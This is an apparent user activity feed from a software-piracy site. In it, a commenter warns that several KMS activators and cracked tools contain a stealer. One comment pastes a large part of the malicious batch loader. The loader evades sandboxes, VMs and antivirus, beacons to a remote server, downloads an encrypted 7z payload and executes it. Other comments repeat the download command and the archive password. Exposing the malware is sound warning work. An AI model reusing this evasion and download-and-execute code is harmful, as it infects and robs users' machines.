Activity

  • 29 February 2024
  • maorosh
    maorosh ·
    commented in GoodSync 12.7.5.5 Pro | Enterprise | Server | GoodSync2Go Portable | RePack by elchupacabra
    12.5.6
    new patch is needed
  • 11 January 2024
  • maorosh
    maorosh ·
    commented in KMS Matrix 6.6 by GodMatrix
    its similer to Windows Activator by Goddy [v4.8]
    same group of shiti people
  • maorosh
    maorosh ·
    commented in KMS Matrix 6.6 by GodMatrix
    virus ... 
    here is some bad code.
    found inside the source code

    ZZZZZZZZZZZZ

    :KMSReActivation

    set «osB=%PROCESSOR_ARCHITECTURE%»

    if defined PROCESSOR_ARCHITEW6432 set «osB=AMD64»

    if "%osB%"==«x86» (

    set «bits=»

    set «pf=%SystemDrive%\Program Files»

    ) else (

    set «pf=%SystemDrive%\Program Files (x86)»

    set «bits=/reg:32»

    )

    set yn=23

    for /f %%a in ('wmic path win32_LocalTime Get Day^,Month^,Year /value') do >nul set "%%a"

    set Month=00%Month%

    set Month=%Month:~-2%

    set Year=00%Year%

    set Year=%Year:~-2%

    set dt=%Day%%Month%%Year%

    set «cnfv=%tmp%\cnf»

    for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

    set «dt1v=%d1%%m1%%yn%»

    set «dt2v=%d2%%m1%%yn%»

    set «dt3v=%d3%%m1%%yn%»

    if %dt% equ %dt1v% exit

    if %dt% equ %dt2v% exit

    if %dt% equ %dt3v% exit

    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq SbieSvc.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «SbieSvc.exe» exit

    reg query «HKLM\SOFTWARE\Microsoft\Alu» /s %bits%

    if %ERRORLEVEL% equ 0 exit

    reg Add «HKLM\SOFTWARE\Microsoft\Alu» /f %bits%

    for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation» /v «SystemProductName» ') do set vm1="%%b"

    for /f «tokens=2*» %%a in (' reg query «HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\Current» /v «SystemProductName» ') do set vm2="%%b"

    if %vm1% equ «KVM» exit

    if %vm1% equ «VirtualBox» exit

    if %vm2% equ «Virtual Machine» exit

    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq ekrn.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «ekrn.exe» exit

    for /f tokens^=1^ delims^=^" %%i in ('tasklist /fi «imagename eq QHActiveDefense.exe» /fo csv /nh') do set sb=%%~i

    if "%sb%" equ «QHActiveDefense.exe» exit

    d%v70%i%v71%r /S "%SystemDrive%\Program Files\Kaspersky Lab\*.exe"

    if %ERRORLEVEL% equ 0 exit

    d%v70%i%v71%r  /S "%SystemDrive%\Program Files (x86)\Kaspersky Lab\*.exe"

    if %ERRORLEVEL% equ 0 exit

    if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://github.com/cloud1cybertron/wincurl/raw/main/curl.exe', '%windir%\System32\curl.exe')"

    if not exist %windir%\System32\curl.exe powershell "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (new-object net.webclient).DownloadFile('https://zelticloud.net/cu/curl.exe', '%windir%\System32\curl.exe')"

    if not exist %windir%\System32\curl.exe exit

    set «cnfv=%tmp%\cnf»

    for /f «usebackq delims=;» %%i in ("%cnfv%") do set %%~i

    set p1=%pid%

    set s1=%sid%

    for /f «tokens=* delims= » %%a in ('curl ipinfo.io/ip -k') do set «ei=%%~a»

    for /f «tokens=* delims= » %%a in ('curl ipinfo.io/country -k') do set «ec=%%~a»

    for %%i in (7 8 8.1 10 11) do (wmic os get caption|(>nul findstr /ilc:«Windows %%i»)&&(set es=%%i))

    set didl=8

    setlocal EnableDelayedExpansion EnableExtensions

    for /f «tokens=* delims= » %%a in ('curl -k c.zeltitmp.net/c01.php --user-agent «c010101» ') do set «aaajkbkdfkjlgjfdkljhg4df=%%~a»

    set num_t=16

    set «num_set=0123456789abcdef»

    :grmd

    set /a «rnd=%num_t%*%random%/32768»

    set «ed=!num_set:~%rnd%,1!%ed%»

    set /a «didl-=1»

    if %didl% gtr 0 goto grmd

    set /a rg1=(%random%%%100)+1

    if %rg1% == 1 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5377.168 Safari/537.36»

    if %rg1% == 2 set «uat=Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5368.101 Safari/537.36»

    if %rg1% == 3 set «uat=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5386.123 Safari/537.36»

    if %rg1% == 4 set «uat=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like .................................

    curl -k -o „%tmp%\m.7z“ -L „zeltitmp.net/pp/m.7z“ --user-agent „cnfvp201“

    »%pf%\7-zip\7z.exe" x "%tmp%\m.7z" -o"%tmp%" -pconfigvpnG2012885838482012ggg -y

    if exist %tmp%\m.bat powershell %tmp%\m.bat

    del %tmp%\cnf

    del %tmp%\cc.7z

    exit
  • 27 December 2023
  • maorosh
    maorosh ·
    commented in Windows Activator by Goddy 5.0
    its a stealer 

    `
    :: password configvpnG2012885838482012ggg
    curl -k -o «m.7z» -L «zeltitmp.net/pp/m.7z» --user-agent «cnfvp201»
    rem From m.bat
  • maorosh
    maorosh ·
    commented in Windows Activator by Goddy 5.0
    Ratiborus is great. I don't know why others do such shit 13
  • maorosh
    maorosh ·
    commented in Windows Activator by Goddy 5.0
    drop virus ......
    curl -k -o "\m.7z" -L «zeltitmp.net/pp/m.7z» --user-agent ""

    «C:\Program Files (x86)\7-Zip\7z.exe» x "\m.7z" -o"" -pconfigvpnG2012885838482012ggg -y
  • 18 April 2023
  • maorosh
    maorosh ·
    voted for post Office(R)Tool 13.0